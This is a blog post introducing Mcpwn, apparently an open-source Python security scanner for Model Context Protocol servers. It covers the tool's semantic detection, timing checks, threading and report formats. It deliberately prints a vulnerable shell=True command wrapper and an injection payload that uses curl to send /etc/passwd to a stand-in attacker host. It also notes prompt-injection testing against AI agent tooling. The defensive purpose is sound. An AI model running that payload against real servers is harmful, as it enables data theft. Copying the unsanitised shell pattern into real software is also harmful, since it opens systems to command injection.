Model Context Protocol (MCP) is Anthropic's new standard for connecting AI agents to external tools and data sources. As I started working with MCP servers, I realized something concerning: there's no automated security testing for them.
The Problem
MCP servers give AI agents powerful capabilities, including file operations, command execution, and database access. A single vulnerable tool can mean full system compromise, and manual code review often overlooks injection vulnerabilities in tool arguments.
Here's what I found during a security review:
import subprocess

# Looks safe in code review, right?
def execute_command(command: str):
    return subprocess.run(command, shell=True, capture_output=True)
The vulnerability? Tool arguments weren't sanitized. An AI agent could inject:
"ls; curl http://attacker.com/exfil?data=$(cat /etc/passwd)"
Building Mcpwn
I built Mcpwn - an automated security scanner for MCP servers. The name is a play on "MCP pwn" (compromise).
Key Design Decisions
1. Semantic Detection Over Crash Detection
Instead of looking for crashes, Mcpwn analyzes response content for patterns:
- `uid=1000(user)` → Command injection
- `root:x:0:0:root` → Path traversal
- `-----BEGIN PRIVATE KEY` → File read vulnerability
- Timing deviations → Blind injection
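The timing case works by comparing latency against a baseline rather than matching strings. Roughly like this (an illustrative sketch; `call_tool` stands in for whatever sends the MCP request, it is not Mcpwn's API):

```python
import time

def looks_like_blind_injection(call_tool, tool, benign_args, sleep_args,
                               delay=5.0, slack=1.0):
    """Flag a tool if a sleep-style payload takes measurably longer than a benign call.
    `call_tool` stands in for whatever sends the MCP request."""
    start = time.monotonic()
    call_tool(tool, benign_args)
    baseline = time.monotonic() - start

    start = time.monotonic()
    call_tool(tool, sleep_args)          # e.g. an argument containing "; sleep 5"
    delayed = time.monotonic() - start

    # A deviation roughly matching the injected delay is the signal
    return delayed - baseline >= delay - slack
```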
2. Zero Dependencies
Pure Python stdlib. No pip install needed. This was critical for:
- CI/CD integration (no dependency hell)
- Security auditing (less attack surface)
- Quick adoption (clone and run)
3. Structured Output
JSON and SARIF formats for AI analysis and CI/CD integration:
{
"summary": {
"total": 3,
"by_severity": {"CRITICAL": 2, "HIGH": 1}
},
"findings": [...]
}
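In a pipeline, that summary is enough to build a pass/fail gate with a few lines of stdlib Python (a sketch; the field names match the report above, the blocking threshold is your call):

```python
import json
import sys

# Fail the pipeline if the report contains CRITICAL or HIGH findings
with open("report.json") as f:
    report = json.load(f)

by_severity = report["summary"]["by_severity"]
blocking = by_severity.get("CRITICAL", 0) + by_severity.get("HIGH", 0)

if blocking:
    print(f"Mcpwn: {blocking} blocking finding(s)", file=sys.stderr)
    sys.exit(1)
```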
Architecture
The scanner has three core components:
core/
├── pentester.py # Orchestrator (thread-safe, timeout handling)
├── detector.py # Semantic detection engine
└── reporter.py # JSON/HTML/SARIF reports
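At a high level, the orchestrator spawns the target server, enumerates its tools, fires payloads at each argument, and hands every response to the detector. A compressed sketch of that loop, with illustrative names rather than the real pentester.py internals:

```python
# Compressed control flow of a scan (illustrative names, not the real pentester.py)
def scan(server, payloads, detector, reporter, timeout=10):
    tools = server.list_tools()                    # MCP tools/list
    for tool in tools:
        for payload in payloads.for_tool(tool):    # injection strings per argument
            response = server.call_tool(tool, payload, timeout=timeout)
            finding = detector.analyze(tool, payload, response)
            if finding:
                reporter.add(finding)
    return reporter.render()                       # JSON / HTML / SARIF
```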
Attack Surface Coverage
Currently implemented:
- Tool argument injection (RCE, path traversal)
- Resource path traversal
- Prompt injection (context confusion, delimiter breakout)
- Protocol fuzzing (malformed JSON-RPC)
- State desync attacks
- Resource exhaustion
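The protocol-fuzzing checks, for instance, come down to sending malformed JSON-RPC frames and watching how the server copes. A small sketch of the kind of payloads involved (Mcpwn's actual corpus is larger):

```python
import json

# Examples of malformed JSON-RPC 2.0 frames a protocol fuzzer sends (illustrative)
MALFORMED_FRAMES = [
    '{"jsonrpc": "2.0", "method": "tools/call"',                    # truncated JSON
    '{"jsonrpc": "1.0", "id": 1, "method": "tools/list"}',          # wrong protocol version
    json.dumps({"jsonrpc": "2.0", "id": None, "method": ""}),       # null id, empty method
    json.dumps({"jsonrpc": "2.0", "id": 2, "method": "tools/call",
                "params": {"name": "x" * 100_000}}),                # oversized field
]
```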
Detection example:
import re

# Semantic detector checks response patterns
def detect_rce(response: str) -> bool:
    patterns = [
        r'uid=\d+\([^)]+\)',   # Unix user ID
        r'gid=\d+\([^)]+\)',   # Unix group ID
        r'root:x:0:0:root',    # /etc/passwd
    ]
    return any(re.search(p, response) for p in patterns)
Real-World Impact
During testing, Mcpwn found RCE vulnerabilities in production MCP servers, specifically tool argument injection patterns that manual code review had missed.
Example finding:
$ python mcpwn.py --quick npx -y @modelcontextprotocol/server-filesystem /tmp
[INFO] Found 2 tools, 0 resources
[WARNING] execute_command: RCE via command
[WARNING] Detection: uid=1000(user) gid=1000(user)
[INFO] Mcpwn complete
Usage
Quick scan (5 seconds):
python mcpwn.py --quick npx -y @modelcontextprotocol/server-filesystem /tmp
Generate JSON report for AI analysis:
python mcpwn.py --output-json report.json <your-mcp-server>
CI/CD integration (SARIF format):
python mcpwn.py --output-sarif report.sarif <your-mcp-server>
AI-Assisted Security Workflow
Mcpwn is designed to work with AI assistants:
- Automated baseline scan → Mcpwn finds pattern-based vulnerabilities
- Structured output → JSON/SARIF for AI parsing
- AI deep analysis → Validates findings, finds logic flaws Mcpwn missed
This hybrid approach combines automated pattern matching with AI contextual understanding.
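The hand-off itself can be as simple as folding the JSON findings into a triage prompt for whichever assistant you use (a sketch; the report path and the prompt wording are placeholders):

```python
import json

# Turn an Mcpwn JSON report into a triage prompt (illustrative; adapt the wording)
with open("report.json") as f:
    findings = json.load(f)["findings"]

prompt = ("Review these MCP scanner findings. For each one, judge whether it is "
          "exploitable in practice and suggest a fix:\n\n")
for i, finding in enumerate(findings, 1):
    prompt += f"{i}. {json.dumps(finding, indent=2)}\n"

# `prompt` is then pasted into, or sent to, the AI assistant doing deep analysis
```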
Lessons Learned
1. Semantic detection beats crash detection
Looking for uid=1000 in responses is more reliable than waiting for segfaults. Many vulnerabilities don't crash - they just leak data.
2. Thread safety is critical
MCP servers are concurrent. Request ID generation, health checks, and send operations all needed proper locking.
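Request ID allocation is the textbook case: a bare counter races under concurrent sends, so it needs a lock. A minimal sketch of the pattern (not the exact Mcpwn code):

```python
import threading

class RequestIdAllocator:
    """Hands out unique JSON-RPC request IDs safely across threads (illustrative)."""
    def __init__(self):
        self._next = 1
        self._lock = threading.Lock()

    def next_id(self) -> int:
        with self._lock:   # read-increment-return as one atomic step
            request_id = self._next
            self._next += 1
            return request_id
```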
3. Timeouts everywhere
Default 10s timeout with configurable overrides. Quick mode uses 5s. Learned this after hanging on unresponsive servers.
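With a stdio transport and no third-party libraries, the simplest way to enforce that deadline is to drain the server's stdout on a background thread and wait on a queue. A sketch of the idea (illustrative, not Mcpwn's implementation):

```python
import queue
import threading

def start_reader(stream):
    """Drain the server's stdout on a daemon thread so a stuck server can't hang the scanner."""
    lines: queue.Queue = queue.Queue()

    def pump():
        for line in stream:
            lines.put(line)

    threading.Thread(target=pump, daemon=True).start()
    return lines

def read_response(lines: queue.Queue, timeout: float = 10.0):
    """Wait up to `timeout` seconds for the next response line; None means unresponsive."""
    try:
        return lines.get(timeout=timeout)
    except queue.Empty:
        return None
```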
4. False positives matter
Path traversal detection requires 2+ markers to reduce false positives. Single marker = too noisy.
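In code that rule is just a threshold over independent markers, roughly like this (the marker set here is illustrative):

```python
import re

# Require at least two independent markers before reporting path traversal
TRAVERSAL_MARKERS = [
    r'root:x:0:0:',                                  # /etc/passwd entry
    r'daemon:x:\d+:\d+:',                            # another passwd entry
    r'\[boot loader\]',                              # Windows boot.ini
    r'-----BEGIN (RSA |OPENSSH )?PRIVATE KEY-----',  # leaked key material
]

def detect_path_traversal(response: str, min_markers: int = 2) -> bool:
    hits = sum(1 for p in TRAVERSAL_MARKERS if re.search(p, response))
    return hits >= min_markers
```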
What's Next
Planned features:
- SSRF injection detection
- Deserialization attack testing
- Schema pollution checks
- Auth bypass testing
Current limitations:
Mcpwn detects runtime exploits but misses:
- Configuration vulnerabilities (exposed credentials)
- Business logic flaws
- Complex multi-step attack chains
Automated tools find known patterns. Manual review finds logic flaws. Use both.
Try It
GitHub: https://github.com/Teycir/Mcpwn
Quick start:
git clone https://github.com/Teycir/Mcpwn.git
cd Mcpwn
python3 mcpwn.py --help
MIT licensed, 45 passing tests, zero dependencies.
What security testing approaches have you found effective for AI agent infrastructure? Drop a comment below.